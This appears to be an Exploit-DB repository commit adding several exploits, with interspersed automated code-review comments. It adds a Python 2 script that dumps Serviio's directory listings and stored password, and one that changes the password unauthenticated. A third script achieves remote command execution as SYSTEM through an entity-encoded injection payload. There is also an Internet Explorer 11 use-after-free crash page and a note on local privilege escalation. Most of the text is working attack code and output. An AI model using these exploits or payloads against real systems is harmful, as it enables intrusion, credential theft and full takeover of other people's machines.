DB: 2017-05-04

5 new exploits

Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free

Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation
Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure
Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change
Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution
Offensive Security 2017-05-04 05:01:18 +00:00
parent 6515e26356
commit b473ba51f3
6 changed files with 590 additions and 0 deletions


@ -5482,6 +5482,7 @@ id,file,description,date,author,platform,type,port
41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
41957,platforms/windows/dos/41957.html,"Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8967,6 +8968,7 @@ id,file,description,date,author,platform,type,port
41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -37805,3 +37807,6 @@ id,file,description,date,author,platform,type,port
41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
41958,platforms/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,java,webapps,0
41960,platforms/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,java,webapps,0
41961,platforms/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,windows,webapps,0


141
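--- a/platforms/java/webapps/41958.py
+++ b/platforms/java/webapps/41958.py
@@ -0,0 +1,141 @@
+#!/usr/bin/env python
+#
+#
+# Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure
+#
+#
+# Vendor: Petr Nejedly | Six Lines Ltd
+# Product web page: http://www.serviio.org
+# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
+#
+# Summary: Serviio is a free media server. It allows you to stream your media
+# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
+# games console or mobile phone) on your connected home network.
+#
+# Vendor:
+# "Security:
+# MediaBrowser (as well as any app that uses the API) uses well proven security techniques,
+# so that you can be sure your content is only accessed by you. Make sure you keep your password
+# secure."
+#
+# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
+# by an information disclosure vulnerability due to improper access control enforcement
+# of the Configuration REST API. An unauthenticated, remote attacker can exploit this,
+# via a specially crafted request, to gain access to potentially sensitive information.
+#
+# Tested on: Restlet-Framework/2.2
+# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
+# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
+# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2017-5404
+# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php
+#
+# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
+#
+#
+# 12.12.2016
+#
+import sys
+import xml.etree.ElementTree as ET
+from urllib2 import Request, urlopen
+if (len(sys.argv) <= 2):
+print '[*] Usage: serviio_id.py <ip address> <port>'
+print '[*] Example: serviio_id.py 10.211.55.3 23423'
+exit(0)
+host = sys.argv[1]
+port = sys.argv[2]
+headers = {'Accept': 'application/xml'}
+request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers)
+print '\nPrinting ServiioLinks:'
+print '----------------------\n'
+response_body = urlopen(request).read()
+roottree = ET.fromstring(response_body)
+for URLs in roottree.iter('serviioLink'):
+print URLs.text
+print
+headers = {'Accept': 'application/xml'}
+#request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers)
+request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers)
+print '\nPrinting directories:'
+print '---------------------\n'
+response_body = urlopen(request).read()
+roottree = ET.fromstring(response_body)
+for URLs in roottree.iter('path'):
+print URLs.text
+print
+headers = {'Accept': 'application/xml'}
+request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers)
+print '\nPrinting mediabrowser password:'
+print '-------------------------------\n'
+response_body = urlopen(request).read()
+roottree = ET.fromstring(response_body)
+for URLs in roottree.iter('remoteUserPassword'):
+print URLs.text
+print
+'''
+rewt@zslab:~# python serviio_id.py 10.211.55.3 23423
+Printing ServiioLinks:
+----------------------
+serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml
+serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl
+serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource
+Printing directories:
+---------------------
+/etc/apache2
+/etc/asl
+/etc/cups
+/etc/defaults
+/etc/emond.d
+/etc/mach_init.d
+/etc/mach_init_per_login_session.d
+/etc/mach_init_per_user.d
+/etc/manpaths.d
+/etc/newsyslog.d
+/etc/openldap
+/etc/pam.d
+/etc/paths.d
+/etc/periodic
+/etc/pf.anchors
+/etc/postfix
+/etc/ppp
+/etc/racoon
+/etc/security
+/etc/snmp
+/etc/ssh
+/etc/ssl
+/etc/sudoers.d
+Printing mediabrowser password:
+-------------------------------
+s3cr3to
+rewt@zslab:~#
+'''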
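Review bot: The usage branch at the top of the script ends in `exit(0)` after printing the usage text, so a missing-argument error is reported to the shell as success; `sys.exit(1)` there would let callers tell the two apart. The same pattern appears in 41960.py and 41961.py in this commit. All three files are Python 2 code (`print` statements, `urllib2`) under a `#!/usr/bin/env python` shebang, and none of the header comments say so; a one-line note such as `# Requires Python 2 (urllib2, print statement)` would save the next reader a SyntaxError on systems where `python` is Python 3. The three request/parse/print stanzas here are near-identical copies differing only in the REST path and the element name iterated, and a small helper taking those two values would make that structure explicit.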

77
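--- a/platforms/java/webapps/41960.py
+++ b/platforms/java/webapps/41960.py
@@ -0,0 +1,77 @@
+#!/usr/bin/env python
+#
+#
+# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Password Change
+#
+#
+# Vendor: Petr Nejedly | Six Lines Ltd
+# Product web page: http://www.serviio.org
+# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
+#
+# Summary: Serviio is a free media server. It allows you to stream your media
+# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
+# games console or mobile phone) on your connected home network.
+#
+# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
+# by an unauthenticated password modification vulnerability due to improper access
+# control enforcement of the Configuration REST API. A remote attacker can exploit this,
+# via a specially crafted request, to change the login password for the mediabrowser protected
+# page.
+#
+# Tested on: Restlet-Framework/2.2
+# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
+# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
+# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2017-5407
+# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php
+#
+# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
+#
+#
+# 12.12.2016
+#
+import sys
+import xml.etree.ElementTree as ET
+from urllib2 import Request, urlopen
+if (len(sys.argv) <= 3):
+print '[*] Usage: serviio_pwd.py <ipaddress> <port> <newpassword>'
+print '[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2'
+exit(0)
+host = sys.argv[1]
+port = sys.argv[2] #default port for console is 23423, and for the mediabrowser is 23424.
+lozi = sys.argv[3]
+values = """
+<remoteAccess>
+<remoteUserPassword>{0}</remoteUserPassword>
+<preferredRemoteDeliveryQuality>ORIGINAL</preferredRemoteDeliveryQuality>
+<portMappingEnabled>true</portMappingEnabled>
+<externalAddress>myserviio.dyndns.com</externalAddress>
+</remoteAccess>"""
+put = values.format(lozi)
+headers = {
+'Content-Type': 'application/xml',
+'Accept': 'application/xml'
+}
+request = Request('http://'+host+':'+port+'/rest/remote-access', data=put, headers=headers)
+request.get_method = lambda: 'PUT'
+response_body = urlopen(request).read()
+roottree = ET.fromstring(response_body)
+for errorcode in roottree.iter('errorCode'):
+print "\nReceived error code: "+errorcode.text
+print 'Password successfully changed to: '+lozi
+print 'Go to: http://'+host+':23424/mediabrowser\n'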
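Review bot: The last two `print` lines run unconditionally, so after the loop has just printed `Received error code: ...` from the response the script still reports `Password successfully changed to: ...`; collecting the codes first, `errors = [e.text for e in roottree.iter('errorCode')]`, and printing the success lines only under `if not errors:` keeps the output consistent with what the server answered. The PUT body also sends fixed values for `preferredRemoteDeliveryQuality`, `portMappingEnabled` and `externalAddress` alongside the new password, which replaces those three remote-access settings on the target as well; the `Desc:` block describes only the password change, and a sentence stating that the whole `remoteAccess` resource is overwritten would document the actual effect for anyone assessing impact.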

145
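--- a/platforms/windows/dos/41957.html
+++ b/platforms/windows/dos/41957.html
@@ -0,0 +1,145 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta http-equiv="content-type" content="text/html; charset=UTF-8">
+<meta http-equiv="Expires" content="0" />
+<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
+<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
+<meta http-equiv="Pragma" content="no-cache" />
+<style type="text/css">
+body{
+background-color:black;
+font-color:red;
+};
+</style>
+<script type='text/javascript'></script>
+<script type="text/javascript" language="JavaScript">
+/********************************
+* Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free
+* Google Dork: n/a
+* Date: 03.05.2017
+* Exploit Author: Marcin Ressel
+* TT: @r_esselm
+* Vendor Homepage: www.microsoft.com
+* Software Link: n/a
+* Version: 11.0.9600.18638
+* Tested on: Windows 7
+* CVE : n/a
+* ****************************
+(151c.10a4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0
+eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
+MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x15ae0c:
+706af750 ff36 push dword ptr [esi] ds:002b:1195cfa0=????????
+0:007> !heap -p -a @esi
+address 1195cfa0 found in
+_DPH_HEAP_ROOT @ 9f61000
+in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
+ef4230c: 1195c000 2000
+743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2
+76f9170c ntdll!RtlDebugFreeHeap+0x0000002f
+76f4a863 ntdll!RtlpFreeHeap+0x0000005d
+76ef2bd5 ntdll!RtlFreeHeap+0x00000142
+769c14ad kernel32!HeapFree+0x00000014
+707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046
+6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223
+7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3
+702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2
+702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058
+700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180
+700c5484 MSHTML!CFrameSite::Passivate+0x00000024
+6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1
+6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a
+705517cb MSHTML!CBase::JSBind_Release+0x00000050
+6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023
+6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e
+6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9
+6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a
+6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072
+6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb
+6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e
+6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac
+6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055
+6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a
+6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120
+709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b
+7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3
+706af72d MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x0015ade9
+7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6
+70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
+7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93
+*
+*/
+var ref = [];
+var doc = null;
+var dom = null;
+var trg = null;
+var trg_parent = null;
+var text_r = null;
+var select_o = null;
+function handle() {
+try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){}
+try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){}
+try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){}
+try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){}
+try{select_o.selectAllChildren(ref[1], 0);}catch(e){}
+try{text_r.select();}catch(e){}
+try{tree_r.setEnd(ref[0],0);}catch(e){}
+try{select_o.selectAllChildren(doc.body);}catch(e){}
+try{tree_r.surroundContents(ref[0]);}catch(e){}
+try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){}
+try{tree_r.selectNodeContents(document.body);}catch(e){}
+try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}
+}
+function testcase() {
+var e1f = document.getElementById("e1");
+doc = document.getElementById("t1").contentWindow.document;
+e = e1f.contentWindow.document.createElement("ins");
+e.cite = 'about:blank';
+rf = doc.body.appendChild(e);
+ref.push(rf);
+e = e1f.contentWindow.document.createElement("iframe");
+rf = doc.body.appendChild(e);
+ref.push(rf);
+dom = doc.getElementsByTagName("*");
+trg = dom[3];
+trg_parent = doc.body;
+text_r = doc.body.createTextRange();
+tree_r = doc.createRange();
+tree_r.setStart(trg,0);
+tree_r.setEnd(trg,0);
+select_o = window.getSelection();
+var ob = new MutationObserver(handle);
+ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true });
+try {
+trg.insertBefore(document.createElement("div"),ref[1]);
+} catch(e) {}
+doc.adoptNode(trg.attributes[0]);
+trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "&Agrave;";
+tmp = trg;
+}
+</script>
+<title>IE11 MSHTML!CMarkup::DestroySplayTree Use-After-Free</title>
+</head>
+<body onload='testcase();'>
+<iframe src='about:blank' id='t1' width="100%"></iframe><iframe width="100%" src='about:blank' id='e1'></iframe>
+</body>
+</html>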
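Review bot: `rem` in the second statement of `handle()` is never declared anywhere in the script, so `rem.push(tmp0)` throws a ReferenceError on every invocation and is silently swallowed by the surrounding `try{}catch(e){}`; if the `removeNode` calls earlier on that line are all that is intended, a comment saying so would stop the next reader from treating it as a bug, otherwise `var rem = [];` belongs beside `var ref = [];` with the other globals. `tree_r`, `tmp`, `rf` and `e` in `testcase()` are assigned without `var` and become implicit globals, and only `tree_r` is read again in `handle()`; a short comment on the shared-state block at the top of the script naming which globals the observer callback relies on would make that dependency explicit rather than accidental. The header block gives the crash context but no description of the sequence the two functions perform, which for a DoS PoC is the part a triager needs.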


@ -0,0 +1,66 @@
Serviio PRO 1.8 DLNA Media Streaming Server Local Privilege Escalation
Vendor: Petr Nejedly | Six Lines Ltd
Product web page: http://www.serviio.org
Affected version: 1.8.0.0 PRO
Summary: Serviio is a free media server. It allows you to stream your media
files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
games console or mobile phone) on your connected home network.
Desc: The application suffers from an unquoted search path issue impacting the service
'Serviio' for Windows deployed as part of Serviio DLNA server solution. This could potentially
allow an authorized but non-privileged local user to execute arbitrary code with elevated
privileges on the system. A successful attempt would require the local user to be able to
insert their code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot. If successful, the
local users code would execute with the elevated privileges of the application.
Serviio also suffers from improper permissions which can be used by a simple authenticated user
that can change the executable file with a binary of choice. The vulnerability exist due to the
improper permissions, with the 'F' flag (Full) for 'Users' group, for the Serviio directory and
its sub-directories.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5405
Advisory URL: http://www.zeroscience.mk/en/vulnerability/ZSL-2017-5405.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
12.12.2016
---
C:\>sc qc Serviio
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Serviio
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Serviio\bin\ServiioService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Serviio
DEPENDENCIES : HTTP
SERVICE_START_NAME : LocalSystem
C:\>icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\>


@ -0,0 +1,156 @@
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Desc: The version of Serviio installed on the remote Windows host is affected by
# an unauthenticated remote code execution vulnerability due to improper access control
# enforcement of the Configuration REST API and unsanitized input when FFMPEGWrapper
# calls cmd.exe to execute system commands. A remote attacker can exploit this with a
# simple JSON request, gaining system access with SYSTEM privileges via a specially
# crafted request and escape sequence.
#
# =================================================================================
# org/serviio/ui/resources/server/ActionsServerResource.java:
# -----------------------------------------------------------
#
# private ResultRepresentation checkStreamUrl(ActionRepresentation representation) {
# this.validateParameters(representation, 2);
# try {
# MediaFileType fileType = MediaFileType.valueOf(representation.getParameters().get(0));
# String url = StringUtils.trim(representation.getParameters().get(1));
# LocalItemMetadata md = MetadataFactory.getMetadataInstance(fileType);
# DeliveryContext context = fileType == MediaFileType.VIDEO ? new VideoDeliveryContext(false, null) : new AudioDeliveryContext(false, null);
# FFmpegMetadataRetriever.retrieveOnlineMetadata(md, url, context);
# return this.responseOk();
# }
# catch (InvalidMediaFormatException e) {
# return this.responseOk(603);
# }
#
# =================================================================================
# serviio.jar / external / ProcessExecutor.java:
# ----------------------------------------------
#
# private Map<String, String> createWindowsRuntimeEnvironmentVariables() {
# HashMap<String, String> newEnv = new HashMap<String, String>();
# newEnv.putAll(System.getenv());
# ProcessExecutorParameter[] i18n = new ProcessExecutorParameter[this.commandArguments.length + 2];
# i18n[0] = new ProcessExecutorParameter("cmd");
# i18n[1] = new ProcessExecutorParameter("/C");
# for (int counter = 0; counter < this.commandArguments.length; ++counter) {
# ProcessExecutorParameter argument = this.commandArguments[counter];
# String envName = "JENV_" + counter;
# i18n[counter + 2] = new ProcessExecutorParameter("%" + envName + "%");
# boolean quotesNeededForWindows = this.quotesNeededForWindows(argument);
# if (!quotesNeededForWindows) {
# argument = new ProcessExecutorParameter(this.escapeAmpersandForWindows(argument.getValue()));
# }
# newEnv.put(envName, this.wrapInQuotes(argument, quotesNeededForWindows));
# }
# this.commandArguments = i18n;
# String[] tempPath = FileUtils.splitFilePathToDriveAndRest(System.getProperty("java.io.tmpdir"));
# newEnv.put("HOMEDRIVE", tempPath[0]);
# newEnv.put("HOMEPATH", tempPath[1]);
# newEnv.putAll(this.createFontConfigRuntimeEnvironmentVariables());
# if (log.isTraceEnabled()) {
# log.trace(String.format("Env variables: %s", newEnv.toString()));
# }
# return newEnv;
# }
#
# private String wrapInQuotes(ProcessExecutorParameter argument, boolean quotesNeeded) {
# return (quotesNeeded ? "\"" : "") + argument + (quotesNeeded ? "\"" : "");
# }
#
# protected boolean quotesNeededForWindows(ProcessExecutorParameter argument) {
# boolean quotesNeeded = argument.getValue().indexOf(" ") > -1;
# return quotesNeeded;
# }
#
# private String escapeAmpersandForWindows(String value) {
# return value.replaceAll("&", "^&");
# }
#
# =================================================================================
#
# Tested on: Restlet-Framework/2.2
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Java/1.8.0_121
# Java/1.8.0_111
# Java/1.8.0_91
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5408
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#
#
# The PoC will create a file testingus3.txt in 'C:\Program Files\Serviio\bin' with whoami
# output in it and start a calc.exe child process as nt authority\system.
#
from urllib2 import Request, urlopen
import sys
if (len(sys.argv) <= 1):
print '[*] Usage: serviio_rce.py <ip address>'
exit(0)
host = sys.argv[1]
values = """
<action>
<name>checkStreamUrl</name>
<parameter>VIDEO</parameter>
<parameter>1.2.3.4&#x27;&#x5c;"&#x60;&&#x77;&#x68;&#x6f;&#x61;&#x6d;&#x69;&#x20;>&#x74;&#x65;&#x73;&#x74;&#x69;&#x6e;&#x67;&#x75;&#x73;&#x33;&#x2e;&#x74;&#x78;&#x74;&&&#x63;&#x61;&#x6c;&#x63;&&#x60;&#x27;</parameter>
</action>"""
headers = {
'Content-Type': 'application/xml',
'Accept': 'application/xml'
}
request = Request('http://'+host+':23423/rest/action', data=values, headers=headers)
response_body = urlopen(request).read()
print response_body
'''
Raw request:
POST /rest/action HTTP/1.1
Host: 10.211.55.3:23423
Content-Length: 93
Accept: application/json, text/plain, */*
Origin: http://10.211.55.3:23423
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: http://10.211.55.3:23423/console/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
DNT: 1
Connection: close
{"name":"checkStreamUrl","parameter":["VIDEO","1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"]}
'''
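Review bot: The header says the issue is reachable "with a simple JSON request" and the appended raw request carries `Content-Type: application/json;charset=UTF-8`, but the script itself builds an XML `<action>` document and sends it as `application/xml`; the file does not say whether both encodings were exercised on the three `Tested on:` Java builds, so a sentence in the header such as `# The endpoint accepts the same action as XML (this script) or JSON (see raw request below)` and a label on the appendix would remove the ambiguity. The header's `Desc:` line also states the PoC's side effects only in prose (L535–536 in the commit view) while the payload itself is an entity-encoded string that a reader cannot inspect without decoding; a comment giving the decoded parameter next to the `values` literal would make the two agree, and the raw request at the end already shows that decoded form.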